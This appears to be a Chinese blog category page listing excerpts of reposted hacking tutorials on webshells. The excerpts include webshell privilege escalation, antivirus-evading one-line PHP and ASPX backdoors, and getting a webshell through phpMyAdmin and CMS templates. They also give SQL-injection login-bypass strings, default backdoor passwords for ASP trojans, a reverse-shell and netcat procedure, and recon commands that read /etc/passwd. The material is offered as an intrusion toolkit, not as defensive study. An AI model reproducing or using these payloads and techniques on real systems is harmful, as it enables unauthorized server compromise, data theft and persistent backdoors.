webshell
文章平均质量分 63
fengling132
这个作者很懒,什么都没留下…
展开
-
Linux下WEBSHELL提权
用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。前提:1、目标机上安装了GCC能编译源码 2、Kernel 2.6.x (>= 2.6.13 && 因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把转载 2012-03-30 10:20:31 · 2357 阅读 · 0 评论 -
php打包程序
[php] view plaincopy "Content-Type" content="text/html; charset=gb2312"> PHP整站打包程序-By DoDo "myform" method="post" action=""> ini_set('memory转载 2012-07-10 09:12:19 · 743 阅读 · 0 评论 -
最全的Webshell提权方法总结
在得到了一个Webshell之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权方法,希望对大家有所启发,起到一个抛砖引玉的作用。WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序转载 2012-06-15 00:52:04 · 1113 阅读 · 0 评论 -
关于php一句话免杀的分析
一开始想这样: 客户端用菜刀,密码cmd,url为test.php?ts7=assert 这个应该算没有什么特征码了,但是缺点就是在web日志中会暴露出来assert 可以都用post: 在菜刀说明用ts7=assertpost附加数据. 这中间考虑了这些: 猛然发现assert这个关键词又出现了。。既然字符串可以直接这样转载 2012-05-24 14:30:09 · 703 阅读 · 0 评论 -
PHP 5.4 (5.4.3) Code Execution (Win32)
// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)// Exploit author: 0in (Maksymilian Motyl)// Email: 0in(dot)email(at)gmail.com// * Bug with Variant type parsing originally discovered b转载 2012-05-21 16:40:11 · 996 阅读 · 1 评论 -
@php一句话猥琐流搞法
在渗透中常常遇到拦截eval的,所以这种形式的会被拦截常见的是变成base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=)这种形式可以绕过,另外还有其他形式 今天见一比较怪的东西:web杀毒。v1.0。点。心想是不是谁有跟云扯上了。 完了才知道是个webshell扫描工具。各位前辈把web后门弄的死转载 2012-04-20 22:08:45 · 1196 阅读 · 0 评论 -
可突破安全狗的aspx一句话
在看一个站的时候,发现服务器装了安全狗,刚开始利用IIS6的畸形解析一直被拦截,最后找到了不用畸形解析的办法,传了菜刀的一句话,却连不上,一直返回403,应该是被拦截,后来找了个相对比较生僻的一句话,终于上传并连接成功。服务端一句话木马:<%@ Page Language="C#" ValidateRequest="false" %>客户端截图:转载 2012-05-15 10:10:21 · 1150 阅读 · 0 评论 -
webshell提权的重点目录总结
C:\Documents and Settings\All Users\「开始」菜单\程序\ --‘看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径。C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ --‘看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得转载 2012-04-20 22:01:24 · 826 阅读 · 0 评论 -
提交’时提示ip被记录 防注入系统的利用。
很多朋友在入侵提权的时候都有会遇见,站点纪录了自己的IP。本文就教大家查看本机信息存在对方站点的漏洞,防止被利用例如:网址:http://www.92hack.net/newslist.asp?id=122′提示“你的操作已被记录!”等信息。利用方法:www.92hack.net/sqlin.asp 看是否存在,存在提交http://www.92hack.net转载 2012-04-23 10:34:29 · 1600 阅读 · 0 评论 -
千博企业网站管理系统HitCount.Asp页面注入漏洞
程序都加入了防注入代码的,在NoSql.asp文件中7kccopyd-codeIf EnableStopInjection = True ThenDim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstrFy_In = "’|;|and|exec|insert|select|delete|update|c转载 2012-05-02 12:07:15 · 1285 阅读 · 0 评论 -
php168新版后台模板拿shell 技巧
摘要:php168新版后台模板拿shell技巧 ,PHP类漏洞,安全周边,溜客安全信息网 ...文章作者:Just4u本人一向没什么技术文章,只是一个技巧,欢迎各位补充指点刚刚看了黑影小子渗透cmd5的文章,说后台模板那块和谐了eval我刚刚在官网下载了php168的系统本地搭建起来.主要看了一下后台模板那里我们新建一个页面试试转载 2012-05-02 12:06:19 · 1881 阅读 · 0 评论 -
九种经典的Webshell提权技术
在入侵的时候花了九牛二虎的力气获得了一个webshell, 当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~ 所以服务器和网站管理员要注意了,看看有什么可以利用的来提升权限,通过提权的种种手段你可以知道哪些该是重视的。 第一 如果服务器上有装了pcanywhere服务端,管理员为了管理方便 也给了我们方便,到系统盘的转载 2012-03-20 15:41:40 · 748 阅读 · 0 评论 -
各大Asp木马的万能密码
各大Asp木马的万能密码首先十三webshell9.0VIP版和漫步云端修改版,默认密码?x=x或?web=admin 还有易思免杀ASP大马,密码?PageName=PageName 黑羽黑客基地小马默认密码donqee或kaifeng 朽木奥运版最新ASP木马(黑色版本),朽木奥运版最新ASP木马(绿色版本) 黑客动画吧奥运版最新ASP木马(黑色版本),黑客动画转载 2012-03-19 21:20:31 · 5416 阅读 · 0 评论 -
asp aspx php jsp万能密码
asp aspx万能密码 1: "or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6: "or 1=1-- 7:'or'a'='a 8: "or"="a'='a 9:'or''=' 10:'or'='or' 11: 1 or '1'=转载 2012-03-19 22:27:35 · 4456 阅读 · 0 评论 -
黑客美化版大马_2012版
UserPass ="admin"' 密码clientPassword ="a"'生成后门一句话密码siteurl="aspmuma.cccpan.com"mNametitle ="黑客美化版大马_2012版"' Copyright ="请勿用于非法用途,否则后果作者概不负责"'版权Server.ScriptTimeout=999999999转载 2012-03-16 17:15:31 · 12158 阅读 · 0 评论 -
linux webshell下信息收集和一些提权常用的命令
cat ./../mainfile.php -查看mainfile.php文件内容ls -la – 查看文件列表.ifconfig {eth0 etc} – 查看网卡信息.ps aux – 查看运行进程.gcc in_file -o out_file – 编译c文件.cat /etc/passwd – 查看系统账号.sudo – 普通用户运行root权限的命令,前提是 /etc转载 2012-03-31 13:36:29 · 1055 阅读 · 0 评论 -
linux溢出提权(适合刚学习linux提权的朋友)
本帖最后由 wjs 于 2010-4-3 14:26 编辑 作者wjsqq 825680101我也是刚接触linux,谢谢师傅sunwear的指导。先在网站目录上传1.pl,是个反弹脚本Phpshell执行chmod +x 1.pl,给1.pl执行权限,图0然后执行 ./1.pl 本机IP 1224然后本机监听nc -vv -l -p转载 2012-03-31 13:06:19 · 2449 阅读 · 0 评论 -
phpMyAdmin 后台拿webshell
(旧的东西 记录下 方便以后xxx..)1.如何拿到登陆密码. 自己想办法 2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.3.选择一个Database.运行以下语句.----start code---CREATE TABLE a (cmd text NOT NULL);INSERT转载 2012-08-23 13:35:17 · 751 阅读 · 0 评论